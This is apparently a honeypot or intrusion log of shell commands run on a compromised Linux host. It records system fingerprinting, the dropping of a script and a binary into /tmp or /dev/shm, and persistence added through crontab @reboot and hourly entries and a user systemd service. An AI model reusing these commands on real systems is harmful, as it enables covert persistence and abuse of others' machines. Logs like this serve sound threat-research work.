| Time | Command | Exit |
| 2026-09-01 13:45:51 |
uname -a |
0 |
| 2026-09-01 13:45:52 |
sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done' |
0 |
| 2026-09-01 13:45:53 |
cat /proc/cpuinfo | grep processor | wc -l |
0 |
| 2026-09-01 13:45:55 |
cd "/tmp" && if [ ! -f "w.sh" ]; then cat > "w.sh" && chmod +x w.sh; fi |
1 |
| 2026-09-01 13:45:56 |
CRON="$(crontab -l 2>/dev/null || true)"
echo "$CRON" | grep -F '/tmp/w.sh "astats" "netai" "kstats" "ssh 2 ranges"' >/dev/null 2>&1 || \
printf '%s\n%s\n' "@reboot /tmp/w.sh "astats" "netai" "kstats" "ssh 2 ranges"" "0 * * * * cd "/tmp" && ./w.sh "astats" "netai" "kstats" "ssh 2 ranges"" | (cat -; echo "$CRON") | crontab -
|
127 |
| 2026-09-01 13:45:57 |
sh -lc 'mkdir -p ~/.config/systemd/user && cat > ~/.config/systemd/user/watcher-netai.service && systemctl --user daemon-reload && systemctl --user enable --now watcher-netai.service' |
0 |
| 2026-09-01 13:45:58 |
ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10 |
0 |
| 2026-09-01 13:45:59 |
ps aux | grep astats | grep -v grep | wc -l |
0 |
| 2026-09-01 13:46:00 |
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats |
0 |